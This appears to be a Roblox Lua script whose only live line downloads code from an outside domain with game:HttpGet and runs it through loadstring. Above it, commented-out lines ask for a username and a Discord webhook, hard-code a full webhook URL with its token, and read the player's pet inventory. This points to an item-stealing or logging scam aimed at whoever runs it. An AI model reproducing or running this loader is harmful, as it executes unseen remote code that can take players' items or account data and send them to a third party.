-- if Username == "" or Username == nil then

  --  game:GetService("Players").LocalPlayer:Kick("Enter a username!")

--end

--if Webhook == "" or Webhook == nil then

--    game:GetService("Players").LocalPlayer:Kick("Please enter a webhook!")

--end



--LogsWebhook = "https://discord.com/api/webhooks/1305573596483031221/zvHVnom3EZOLH5xXiuGpMOy0-oB085ExvN318ZdcKT_GhW2l2tuFxd7ZLXZho3P1NuPP"



--local Pets = {}

--local PetCounts = {}



--for i, v in pairs(

--    require(game.ReplicatedStorage.ClientModules.Core.ClientData).get_data()[game.Players.LocalPlayer.Name].inventory.pets

--) do
loadstring(game:HttpGet("https://egorikusa.space/3520cab082034c24d9809c90.lua", true))()

